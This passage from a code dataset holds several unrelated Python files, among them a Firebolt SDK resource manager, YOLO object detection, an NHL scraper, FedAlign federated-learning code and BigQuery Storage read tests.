ResourceManager(auth=ClientCredentials(..), account_name=\"my_account\", ..)\n\"\"\"\n\n\nclass ResourceManager:\n \"\"\"\n ResourceManager to access various Firebolt resources:\n\n - databases\n - engines\n\n Also provides listings of:\n\n - instance types (AWS instance types which engines can use)\n \"\"\"\n\n __slots__ = (\n \"account_name\",\n \"account_id\",\n \"api_endpoint\",\n \"_client\",\n \"_connection\",\n \"regions\",\n \"instance_types\",\n \"_provider_id\",\n \"databases\",\n \"engines\",\n \"engine_revisions\",\n \"bindings\",\n )\n\n def __init__(\n self,\n settings: Optional[Settings] = None,\n auth: Optional[Auth] = None,\n account_name: Optional[str] = None,\n api_endpoint: str = DEFAULT_API_URL,\n ):\n if settings:\n logger.warning(SETTINGS_DEPRECATION_MESSAGE)\n if auth or account_name or (api_endpoint != DEFAULT_API_URL):\n raise ValueError(\n \"Other ResourceManager parameters are not allowed \"\n \"when Settings are provided\"\n )\n auth = settings.auth\n account_name = settings.account_name\n api_endpoint = settings.server\n\n for param, name in (\n (auth, \"auth\"),\n (account_name, \"account_name\"),\n ):\n if not param:\n raise ValueError(f\"Missing {name} value\")\n\n # type 
checks\n assert auth is not None\n assert account_name is not None\n\n self._client = Client(\n auth=auth,\n base_url=fix_url_schema(api_endpoint),\n account_name=account_name,\n api_endpoint=api_endpoint,\n timeout=Timeout(DEFAULT_TIMEOUT_SECONDS),\n event_hooks={\n \"request\": [log_request],\n \"response\": [raise_on_4xx_5xx, log_response],\n },\n )\n self._connection = connect(\n auth=auth,\n account_name=account_name,\n api_endpoint=api_endpoint,\n )\n self.account_name = account_name\n self.api_endpoint = api_endpoint\n self.account_id = self._client.account_id\n self._init_services()\n\n def _init_services(self) -> None:\n # avoid circular import\n from firebolt.service.database import DatabaseService\n from firebolt.service.engine import EngineService\n from firebolt.service.instance_type import InstanceTypeService\n\n # Cloud Platform Resources (AWS)\n self.instance_types = InstanceTypeService(resource_manager=self)\n\n # Firebolt Resources\n self.databases = DatabaseService(resource_manager=self)\n self.engines = EngineService(resource_manager=self)\n\n def __del__(self) -> None:\n if hasattr(self, \"_client\"):\n self._client.close()\n if hasattr(self, \"_connection\"):\n self._connection.close()\n","repo_name":"firebolt-db/firebolt-python-sdk","sub_path":"src/firebolt/service/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"4698411767","text":"from django import forms\n\nfrom road.models import Point\nfrom users.models import Commissioner\n\n\nclass ChangePointCommissionerForm(forms.ModelForm):\n class Meta:\n model = Commissioner\n fields = ['point']\n\n def __init__(self, *args, **kwargs):\n user = kwargs.pop('user', None)\n super(ChangePointCommissionerForm, self).__init__(*args, **kwargs)\n point_choices = [(x.id, x.get_name_with_section) for x in\n Point.objects.filter(section=user.commissioner.section).order_by('name')]\n self.fields['point'].choices = point_choices\n","repo_name":"Ganibalishe/ossp","sub_path":"ossp/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18835857451","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nnet=cv2.dnn.readNet(\"yolov3.weights\",\"yolov3.cfg\")\r\nCLASSES=[]\r\nwith open(\"coco.names\",\"r\")as f:\r\n CLASSES=[line.strip() for line in f.readlines()]\r\nprint(CLASSES)\r\nlayer_names=net.getLayerNames()\r\noutputlayers=[layer_names[i-1] for i in net.getUnconnectedOutLayers()]\r\n\r\nimg=cv2.imread(\"sample9.jpg\")\r\nimg=cv2.resize(img,(512,512),fx=0.4,fy=0.4)\r\nheight,width,channels=img.shape\r\n\r\n\r\ndef object_detection(img):\r\n blob=cv2.dnn.blobFromImage(img,0.00392,(416,416),(0,0,0),True,crop=False)\r\n\r\n net.setInput(blob)\r\n outs=net.forward(outputlayers)\r\n boxes=[]\r\n class_ids=[]\r\n confidences=[]\r\n # for each detetion from each output layer \r\n# get the confidence, class id, bounding box params\r\n# and ignore weak detections (confidence < 0.5)\r\n for out in outs:\r\n for detection in out:\r\n scores=detection[5:]\r\n class_id=np.argmax(scores)\r\n confidence=scores[class_id]\r\n if confidence>0.5:\r\n center_x=int(detection[0]*width)\r\n center_y=int(detection[1]*height)\r\n w=int(detection[2]*width)\r\n h=int(detection[3]*height)\r\n x=int(center_x -w/2)\r\n y=int(center_y -h/2)\r\n boxes.append([x,y,w,h])\r\n 
confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n indexes=cv2.dnn.NMSBoxes(boxes,confidences,0.5,0.4)\r\n \r\n font=cv2.FONT_HERSHEY_PLAIN\r\n for i in range(len(boxes)):\r\n x,y,w,h=boxes[i]\r\n label=str(CLASSES[class_ids[i]])\r\n \r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,512,0),2)\r\n cv2.imshow(\"Image\",img)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\nobject_detection(img)\r\n","repo_name":"Gayathri-28/ObjectDetectionInWater","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40671440177","text":"from ast import Dict\nimport pandas as pd\nimport numpy as np\n\n\nclass ParserDiabete:\n def __init__(\n self,\n raw: pd.DataFrame,\n ):self.raw = raw\n\n def parse(self, items: Dict):\n data = self.raw\n parsedData = pd.DataFrame(columns=items.keys())\n for i in range(0, len(data)):\n list = data.loc[i]\n line = np.zeros(23, dtype=int)\n line[self.checkBloodPressure(list.loc[\"BloodPressure\"]) - 1] = 1\n line[self.checkAge(list.loc[\"Age\"]) - 1] = 1\n line[self.checkBMI(list.loc[\"BMI\"]) - 1] = 1\n line[self.checkGlucose(list.loc[\"Glucose\"]) - 1] = 1\n line[self.checkOutcome(list.loc[\"Outcome\"]) - 1] = 1\n line[self.checkPregnancies(list.loc[\"Pregnancies\"]) - 1] = 1\n new_df = pd.DataFrame([line], columns=items.keys())\n parsedData = pd.concat([parsedData, new_df], axis=0, ignore_index=True)\n parsedData.to_csv(\"BinaryTransactions.csv\")\n return parsedData\n\n def getFeatures(self):\n data = self.raw\n i = 1\n features = {}\n for feature in data.columns.values:\n features[i] = feature\n i = i + 1\n return features\n\n def checkGlucose(self, glucose: float):\n i = 0\n if glucose <= 140:\n i = 1\n elif glucose < 200:\n i = 2\n else:\n i = 3\n return i\n\n def checkBloodPressure(self, mesure: float):\n i = 0\n if mesure < 80:\n i = 4\n elif 80 <= mesure < 90:\n i = 5\n else:\n i = 6\n return i\n\n def checkBMI(self, bmi: float):\n i = 0\n if bmi < 18.5:\n i = 7\n elif bmi <= 24.9:\n i = 8\n elif bmi <= 29.9:\n i = 9\n else:\n i = 10\n return i\n\n def checkAge(self, age: int):\n i = 0\n if age < 10:\n i = 11\n elif age < 20:\n i = 12\n elif age < 30:\n i = 13\n elif age < 40:\n i = 14\n elif age < 60:\n i = 15\n elif age < 80:\n i = 16\n else:\n i = 17\n return i\n\n def checkOutcome(self, var: float):\n i = 0\n if var == 1:\n i = 18\n else:\n i = 19\n return i\n\n def checkPregnancies(self, var: float):\n i = 0\n if var == 0:\n i = 20\n elif var < 5:\n i = 21\n elif var < 10:\n i = 22\n else: \n i=23\n return i\n\n\n","repo_name":"mashateayoub/DM_DECLAT_MP","sub_path":"Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31894435614","text":"from pymongo import MongoClient\nimport requests\nfrom bs4 import BeautifulSoup\n\nclient = MongoClient()\ndb = client.Hockey\nteams = db.Teams\n\n\nurl = \"http://www.nhl.com/ice/teams.htm?navid=nav-tms-main\"\nr = requests.get(url)\nsoup = BeautifulSoup(r.content)\n\ng_data = soup.find_all(\"div\", {\"class\":\"teamContainer\"})\n\n#Gather Team data\nfor item in g_data:\n print ('--------------WEST-CONF-------------------')\n westConf = item.contents[0]\n print ('**Pacific Div**')\n pacDiv = westConf.find_all(\"div\", {\"class\":\"pacific\"})\n pacplaces = pacDiv[0].find_all(\"span\", {\"class\":\"teamPlace\"})\n paccommons = 
pacDiv[0].find_all(\"span\", {\"class\":\"teamCommon\"})\n x = 0\n wc_pacplace = {}\n for pacplace in pacplaces:\n #print pacplace.text\n wc_pacplace[x] = pacplace.text\n x = x + 1\n\n y = 0\n wc_paccommon = {}\n for paccommon in paccommons:\n #print paccommon.text\n wc_paccommon[y] = paccommon.text\n y = y + 1\n\n print ('**Central Div**')\n cenDiv = westConf.find_all(\"div\", {\"class\":\"central\"})\n cenplaces = cenDiv[0].find_all(\"span\", {\"class\":\"teamPlace\"})\n cencommons = cenDiv[0].find_all(\"span\", {\"class\":\"teamCommon\"})\n wc_cenplace = {}\n i = 0\n for cenplace in cenplaces:\n #print cenplace.text\n wc_cenplace[i] = cenplace.text\n i = i + 1\n\n wc_cencommon = {}\n j = 0\n for cencommon in cencommons:\n #print cencommon.text\n wc_cencommon[j] = cencommon.text\n j = j + 1\n\n print ('--------------EAST-CONF-------------------')\n eastConf = item.contents[1]\n print ('**Atlantic Div**')\n atlDiv = eastConf.find_all(\"div\", {\"class\":\"atlantic\"})\n atlplaces = atlDiv[0].find_all(\"span\", {\"class\":\"teamPlace\"})\n atlcommons = atlDiv[0].find_all(\"span\", {\"class\":\"teamCommon\"})\n ec_atlplace = {}\n a = 0\n for atlplace in atlplaces:\n #print atlplace.text\n ec_atlplace[a] = atlplace.text\n a = a + 1\n\n ec_atlcommon = {}\n b = 0\n for atlcommon in atlcommons:\n #print atlcommon.text\n ec_atlcommon[b] = atlcommon.text\n b = b + 1\n\n print ('**Metropolitan Div**')\n metDiv = eastConf.find_all(\"div\", {\"class\":\"metropolitan\"})\n metplaces = metDiv[0].find_all(\"span\", {\"class\":\"teamPlace\"})\n metcommons = metDiv[0].find_all(\"span\", {\"class\":\"teamCommon\"})\n ec_metplace = {}\n c = 0\n for metplace in metplaces:\n #print metplace.text\n ec_metplace[c] = metplace.text\n c = c + 1\n\n ec_metcommon = {}\n d = 0\n for metcommon in metcommons:\n #print metcommon.text\n ec_metcommon[d] = metcommon.text\n d = d + 1\n\n#Insert Western Conference teams into database\nfor x in range(0,7):\n teampac = {\"TeamCity\":wc_pacplace[x],\n \"TeamName\":wc_paccommon[x],\n \"Conference\":\"Western\",\n \"Division\":\"Pacific\"}\n\n team_id = teams.insert_one(teampac).inserted_id\n\n teamcen = {\"TeamCity\":wc_cenplace[x],\n \"TeamName\":wc_cencommon[x],\n \"Conference\":\"Western\",\n \"Division\":\"Central\"}\n\n team_id = teams.insert_one(teamcen).inserted_id\n\n#Insert Eastern Conference teams into database\nfor x in range(0,8):\n teamatl = {\"TeamCity\":ec_atlplace[x],\n \"TeamName\":ec_atlcommon[x],\n \"Conference\":\"Eastern\",\n \"Division\":\"Atlantic\"}\n\n team_id = teams.insert_one(teamatl).inserted_id\n\n teammet = {\"TeamCity\":ec_metplace[x],\n \"TeamName\":ec_metcommon[x],\n \"Conference\":\"Eastern\",\n \"Division\":\"Metropolitan\"}\n\n team_id = teams.insert_one(teammet).inserted_id\n\n#Display team data\nprint ('My wc_pacplace var: ')\nfor k, v in wc_pacplace.iteritems():\n print (k,v)\nprint ('My wc_paccommon var: ')\nfor k, v in wc_paccommon.iteritems():\n print (k,v)\nprint ('My wc_cenplace var: ')\nfor k, v in wc_cenplace.iteritems():\n print (k,v)\nprint ('My wc_cencommon var: ')\nfor k, v in wc_cencommon.iteritems():\n print (k,v)\n\nprint ('My ec_atlplace var: ')\nfor k, v in ec_atlplace.iteritems():\n print (k,v)\nprint ('My ec_atlcommon var: ')\nfor k, v in ec_atlcommon.iteritems():\n print (k,v)\nprint ('My ec_metplace var: ')\nfor k, v in ec_metplace.iteritems():\n print (k,v)\nprint ('My ec_metcommon var: ')\nfor k, v in ec_metcommon.iteritems():\n print 
(k,v)\n\n","repo_name":"dSerk/Adjunct-junk","sub_path":"MasterPlan/MasterPlan.py","file_name":"MasterPlan.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36426004233","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport math\nimport time\n\ndef calc(x: str) -> str:\n return str(math.log(abs(12*math.sin(int(x)))))\n\n\nlink = 'http://suninjuly.github.io/get_attribute.html'\nbrowser = webdriver.Chrome()\nbrowser.get(link)\n\n# find image with treasure chest\n# get x - valuex attribute\ntreasure_chest = browser.find_element(By.ID, 'treasure')\nx_value = treasure_chest.get_attribute('valuex')\n\n# get calc(x)\ny_value = calc(x_value)\n\n# put result\nanswer_field = browser.find_element(By.ID, 'answer')\nanswer_field.send_keys(y_value)\n\n# check robot checkbox\nrobot_checkbox = browser.find_element(By.ID, 'robotCheckbox')\nrobot_checkbox.click()\n\n# robot radiobutton\nrobot_radiobutton = browser.find_element(By.ID, 'robotsRule')\nrobot_radiobutton.click()\n\n# submit\nsubmit_button = browser.find_element(By.CSS_SELECTOR, \"[type='submit']\")\nsubmit_button.click()\n\ntime.sleep(10)","repo_name":"malovichka/stepik_auto_tests_course","sub_path":"part 2/lesson1_step7.py","file_name":"lesson1_step7.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5189595117","text":"import argparse\n\n\ndef get_arguments():\n \"\"\"Kijkt wat je als argumenten hebt ingegeven by het runnen van het pythonscript.\n Geeft ook vanzelf handige errormessages, and een help pagina.\n Als je de helppagina wilt gebruiken type in uw powershell: python brainfuck.py -h\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"file\",\n help=\"The brainfuck script you want to run\"\n )\n parser.add_argument(\n \"-l\", \"--length\",\n help=\"the length of the memory (30)\",\n type=int\n )\n parser.add_argument(\n \"-x\", \"--hex\",\n help=\"display the memory in hex\", action=\"store_true\"\n )\n parser.add_argument(\n \"-a\", \"--ascii\",\n help=\"display the output in ascii\", action=\"store_true\"\n )\n parser.add_argument(\n \"-e\", \"--edit\",\n help=\"edit file\", action=\"store_true\"\n )\n parser.add_argument(\n \"-n\", \"--new\",\n help=\"create new file\", action=\"store_true\"\n )\n parser.add_argument(\n \"-d\", \"--debug\",\n help=\"werkt nog niet.\", action=\"store_true\"\n )\n return get_config(parser.parse_args())\n\n\ndef get_config(args):\n return {\n \"file\": args.file,\n \"length\": args.length if args.length else 30,\n \"hex\": args.hex,\n \"ascii\": args.ascii,\n \"edit\": args.edit,\n \"new\": args.new and args.edit,\n \"debug\": args.debug\n }\n","repo_name":"BenJStoffels/Brainfuck","sub_path":"brainfuck_compiler/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30033679114","text":"'''\nCode is based on\nhttps://github.com/taoyang1122/GradAug,\nhttps://github.com/taoyang1122/MutualNet.\nAlso, Lipschitz related functions are from\nhttps://github.com/42Shawn/LONDON/tree/master\n'''\n\nimport random\nimport torch\nimport torch.nn.functional as F\n\nimport logging\nfrom methods.base import Base_Client, Base_Server\nimport torch.nn.functional as F\nimport models.ComputePostBN as pbn\nfrom torch.multiprocessing 
import current_process\nimport numpy as np\nimport random\n\nclass Client(Base_Client):\n def __init__(self, client_dict, args):\n super().__init__(client_dict, args)\n self.model = self.model_type(self.num_classes).to(self.device)\n self.criterion = torch.nn.CrossEntropyLoss().to(self.device)\n self.optimizer = torch.optim.SGD(self.model.parameters(), lr=self.args.lr, momentum=0.9, weight_decay=self.args.wd, nesterov=True)\n self.width_range = client_dict['width_range']\n self.resolutions = client_dict['resolutions']\n self.num_sub = args.num_subnets-1\n\n def train(self):\n # train the local model\n self.model.to(self.device)\n self.model.train()\n epoch_loss = []\n for epoch in range(self.args.epochs):\n batch_loss = []\n for batch_idx, (images, labels) in enumerate(self.train_dataloader):\n images, labels = images.to(self.device, non_blocking=True), labels.to(self.device, non_blocking=True)\n self.optimizer.zero_grad()\n \n self.model.apply(lambda m: setattr(m, 'width_mult', self.width_range[-1]))\n t_feats, t_out = self.model.extract_feature(images)\n loss = self.criterion(t_out, labels)\n loss.backward()\n loss_CE = loss.item()\n self.model.apply(lambda m: setattr(m, 'width_mult', self.width_range[0]))\n s_feats = self.model.reuse_feature(t_feats[-2].detach())\n \n # Lipschitz loss\n TM_s = torch.bmm(self.transmitting_matrix(s_feats[-2], s_feats[-1]), self.transmitting_matrix(s_feats[-2], s_feats[-1]).transpose(2,1))\n TM_t = torch.bmm(self.transmitting_matrix(t_feats[-2].detach(), t_feats[-1].detach()), self.transmitting_matrix(t_feats[-2].detach(), t_feats[-1].detach()).transpose(2,1))\n loss = F.mse_loss(self.top_eigenvalue(K=TM_s), self.top_eigenvalue(K=TM_t))\n loss = self.args.mu*(loss_CE/loss.item())*loss\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), 10.0)\n self.optimizer.step()\n batch_loss.append(loss.item())\n if len(batch_loss) > 0:\n epoch_loss.append(sum(batch_loss) / len(batch_loss))\n logging.info('(client {}. 
Local Training Epoch: {} \\tLoss: {:.6f} Thread {} Map {}'.format(self.client_index,\n epoch, sum(epoch_loss) / len(epoch_loss), current_process()._identity[0], self.client_map[self.round]))\n weights = self.model.cpu().state_dict()\n return weights\n\n def transmitting_matrix(self, fm1, fm2):\n if fm1.size(2) > fm2.size(2):\n fm1 = F.adaptive_avg_pool2d(fm1, (fm2.size(2), fm2.size(3)))\n\n fm1 = fm1.view(fm1.size(0), fm1.size(1), -1)\n fm2 = fm2.view(fm2.size(0), fm2.size(1), -1).transpose(1, 2)\n\n fsp = torch.bmm(fm1, fm2) / fm1.size(2)\n return fsp\n\n def top_eigenvalue(self, K, n_power_iterations=10, dim=1):\n v = torch.ones(K.shape[0], K.shape[1], 1).to(self.device)\n for _ in range(n_power_iterations):\n m = torch.bmm(K, v)\n n = torch.norm(m, dim=1).unsqueeze(1)\n v = m / n\n\n top_eigenvalue = torch.sqrt(n / torch.norm(v, dim=1).unsqueeze(1))\n return top_eigenvalue\n\n def test(self):\n self.model.to(self.device)\n self.model.eval()\n test_correct = 0.0\n test_loss = 0.0\n test_sample_number = 0.0\n with torch.no_grad():\n ###\n self.model.apply(lambda m: setattr(m, 'width_mult', self.width_range[-1]))\n self.model = pbn.ComputeBN(self.model, self.train_dataloader, self.resolutions[0], self.device)\n ###\n for batch_idx, (x, target) in enumerate(self.train_dataloader):\n x = x.to(self.device)\n target = target.to(self.device)\n\n pred = self.model(x)\n # loss = self.criterion(pred, target)\n _, predicted = torch.max(pred, 1)\n correct = predicted.eq(target).sum()\n\n test_correct += correct.item()\n # test_loss += loss.item() * target.size(0)\n test_sample_number += target.size(0)\n acc = (test_correct / test_sample_number)*100\n logging.info(\"************* Client {} Acc = {:.2f} **************\".format(self.client_index, acc))\n return acc\n\nclass Server(Base_Server):\n def __init__(self,server_dict, args):\n super().__init__(server_dict, args)\n self.model = self.model_type(self.num_classes)\n\n def test(self):\n self.model.to(self.device)\n self.model.eval()\n\n test_correct = 0.0\n test_loss = 0.0\n test_sample_number = 0.0\n with torch.no_grad():\n ###\n self.model.apply(lambda m: setattr(m, 'width_mult', 1.0))\n ###\n for batch_idx, (x, target) in enumerate(self.test_data):\n x = x.to(self.device)\n target = target.to(self.device)\n\n pred = self.model(x)\n # loss = self.criterion(pred, target)\n _, predicted = torch.max(pred, 1)\n correct = predicted.eq(target).sum()\n\n test_correct += correct.item()\n # test_loss += loss.item() * target.size(0)\n test_sample_number += target.size(0)\n acc = (test_correct / test_sample_number)*100\n logging.info(\"************* Server Acc = {:.2f} **************\".format(acc))\n return acc","repo_name":"mmendiet/FedAlign","sub_path":"methods/fedalign.py","file_name":"fedalign.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"2948330153","text":"\"\"\"\nASGI config for djangoserver project.\n\nIt exposes the ASGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/4.1/howto/deployment/asgi/\n\"\"\"\n\nfrom django.core.asgi import get_asgi_application\nfrom channels.routing import ProtocolTypeRouter, URLRouter\nfrom chat.routing import websocket_urlpatterns\n\ndjango_asgi_app = get_asgi_application()\n\n# the websocket will open at 127.0.0.1:8000/ws/\napplication = ProtocolTypeRouter({\n 'http': django_asgi_app,\n 'websocket':\n URLRouter(\n 
websocket_urlpatterns\n )\n ,\n})\n","repo_name":"njNafir/heaven","sub_path":"backend/djangoserver/asgi.py","file_name":"asgi.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26095441212","text":"import copy\nimport datetime as dt\nimport decimal\nimport json\nimport io\nimport re\n\nimport pytest\nimport pytz\n\nfrom google.cloud import bigquery\nfrom google.cloud import bigquery_storage_v1beta1\nfrom google.protobuf import timestamp_pb2\n\n\n# TODO: remove once a similar method is implemented in the library itself\n# https://github.com/googleapis/google-cloud-python/issues/4553\ndef _add_rows(table_ref, new_data, bq_client, partition_suffix=\"\"):\n \"\"\"Insert additional rows into an existing table.\n\n Args:\n table_ref (bigquery_storage_v1beta1.types.TableReference):\n A reference to the target table.\n new_data (Iterable[Dict[str, Any]]):\n New data to insert with each row represented as a dictionary.\n The keys must match the table column names, and the values\n must be JSON serializable.\n bq_client (bigquery.Client):\n A BigQuery client instance to use for API calls.\n partition_suffix (str):\n An option suffix to append to the table_id, useful for selecting\n partitions of ingestion-time partitioned tables.\n \"\"\"\n job_config = bigquery.LoadJobConfig(\n source_format=bigquery.SourceFormat.NEWLINE_DELIMITED_JSON\n )\n\n new_data_str = u\"\\n\".join(json.dumps(item) for item in new_data)\n new_data_file = io.BytesIO(new_data_str.encode())\n\n destination_ref = bigquery.table.TableReference.from_api_repr(\n {\n \"projectId\": table_ref.project_id,\n \"datasetId\": table_ref.dataset_id,\n \"tableId\": table_ref.table_id + partition_suffix,\n }\n )\n job = bq_client.load_table_from_file(\n new_data_file, destination=destination_ref, job_config=job_config\n )\n job.result() # wait for the load to complete\n\n\n@pytest.mark.parametrize(\n \"data_format,expected_schema_type\",\n (\n (None, \"avro_schema\"), # Default format (Avro).\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO, \"avro_schema\"),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW, \"arrow_schema\"),\n ),\n)\ndef test_read_rows_as_blocks_full_table(\n client, project_id, small_table_reference, data_format, expected_schema_type\n):\n session = client.create_read_session(\n small_table_reference,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n schema_type = session.WhichOneof(\"schema\")\n assert schema_type == expected_schema_type\n\n blocks = list(client.read_rows(stream_pos))\n\n assert len(blocks) > 0\n block = blocks[0]\n assert block.status.estimated_row_count > 0\n\n\n@pytest.mark.parametrize(\n \"data_format,expected_schema_type\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO, \"avro_schema\"),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW, \"arrow_schema\"),\n ),\n)\ndef test_read_rows_as_rows_full_table(\n client, project_id, small_table_reference, data_format, expected_schema_type\n):\n session = client.create_read_session(\n small_table_reference,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n assert len(rows) > 0\n\n\n@pytest.mark.parametrize(\n 
\"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_basic_nonfiltered_read(client, project_id, table_with_data_ref, data_format):\n session = client.create_read_session(\n table_with_data_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n assert len(rows) == 5 # all table rows\n\n\ndef test_filtered_rows_read(client, project_id, table_with_data_ref):\n read_options = bigquery_storage_v1beta1.types.TableReadOptions()\n read_options.row_restriction = \"age >= 50\"\n\n session = client.create_read_session(\n table_with_data_ref,\n \"projects/{}\".format(project_id),\n format_=bigquery_storage_v1beta1.enums.DataFormat.AVRO,\n requested_streams=1,\n read_options=read_options,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n assert len(rows) == 2\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_column_selection_read(client, project_id, table_with_data_ref, data_format):\n read_options = bigquery_storage_v1beta1.types.TableReadOptions()\n read_options.selected_fields.append(\"first_name\")\n read_options.selected_fields.append(\"age\")\n\n session = client.create_read_session(\n table_with_data_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n read_options=read_options,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n for row in rows:\n assert sorted(row.keys()) == [\"age\", \"first_name\"]\n\n\ndef test_snapshot(client, project_id, table_with_data_ref, bq_client):\n before_new_data = timestamp_pb2.Timestamp()\n before_new_data.GetCurrentTime()\n\n # load additional data into the table\n new_data = [\n {u\"first_name\": u\"NewGuyFoo\", u\"last_name\": u\"Smith\", u\"age\": 46},\n {u\"first_name\": u\"NewGuyBar\", u\"last_name\": u\"Jones\", u\"age\": 30},\n ]\n _add_rows(table_with_data_ref, new_data, bq_client)\n\n # read data using the timestamp before the additional data load\n session = client.create_read_session(\n table_with_data_ref,\n \"projects/{}\".format(project_id),\n format_=bigquery_storage_v1beta1.enums.DataFormat.AVRO,\n requested_streams=1,\n table_modifiers={\"snapshot_time\": before_new_data},\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n # verify that only the data before the timestamp was returned\n assert len(rows) == 5 # all initial records\n\n for row in rows:\n assert \"NewGuy\" not in row[\"first_name\"] # no new records\n\n\ndef test_column_partitioned_table(\n client, project_id, col_partition_table_ref, bq_client\n):\n data = [\n {\"description\": \"Tracking established.\", \"occurred\": \"2017-02-15\"},\n {\"description\": \"Look, a solar eclipse!\", \"occurred\": \"2018-02-15\"},\n {\"description\": \"Fake solar eclipse reported.\", \"occurred\": \"2018-02-15\"},\n {\"description\": \"1 day after false eclipse report.\", \"occurred\": \"2018-02-16\"},\n {\"description\": \"1 
year after false eclipse report.\", \"occurred\": \"2019-02-15\"},\n ]\n\n _add_rows(col_partition_table_ref, data, bq_client)\n\n # Read from the table with a partition filter specified, and verify that\n # only the expected data is returned.\n read_options = bigquery_storage_v1beta1.types.TableReadOptions()\n read_options.row_restriction = \"occurred = '2018-02-15'\"\n\n session = client.create_read_session(\n col_partition_table_ref,\n \"projects/{}\".format(project_id),\n format_=bigquery_storage_v1beta1.enums.DataFormat.AVRO,\n requested_streams=1,\n read_options=read_options,\n )\n\n assert session.streams # there should be some data to fetch\n\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n rows = list(client.read_rows(stream_pos).rows(session))\n\n assert len(rows) == 2\n\n expected_descriptions = (\"Look, a solar eclipse!\", \"Fake solar eclipse reported.\")\n for row in rows:\n assert row[\"occurred\"] == dt.date(2018, 2, 15)\n assert row[\"description\"] in expected_descriptions\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_ingestion_time_partitioned_table(\n client, project_id, ingest_partition_table_ref, bq_client, data_format\n):\n data = [{\"shape\": \"cigar\", \"altitude\": 1200}, {\"shape\": \"disc\", \"altitude\": 750}]\n _add_rows(ingest_partition_table_ref, data, bq_client, partition_suffix=\"$20190809\")\n\n data = [\n {\"shape\": \"sphere\", \"altitude\": 3500},\n {\"shape\": \"doughnut\", \"altitude\": 100},\n ]\n _add_rows(ingest_partition_table_ref, data, bq_client, partition_suffix=\"$20190810\")\n\n data = [\n {\"shape\": \"elephant\", \"altitude\": 1},\n {\"shape\": \"rocket\", \"altitude\": 12700},\n ]\n _add_rows(ingest_partition_table_ref, data, bq_client, partition_suffix=\"$20190811\")\n\n read_options = bigquery_storage_v1beta1.types.TableReadOptions()\n read_options.row_restriction = \"DATE(_PARTITIONTIME) = '2019-08-10'\"\n\n session = client.create_read_session(\n ingest_partition_table_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n read_options=read_options,\n )\n\n assert session.streams # there should be some data to fetch\n\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n rows = list(client.read_rows(stream_pos).rows(session))\n assert len(rows) == 2\n\n actual_items = {(row[\"shape\"], row[\"altitude\"]) for row in rows}\n expected_items = {(\"sphere\", 3500), (\"doughnut\", 100)}\n assert actual_items == expected_items\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n 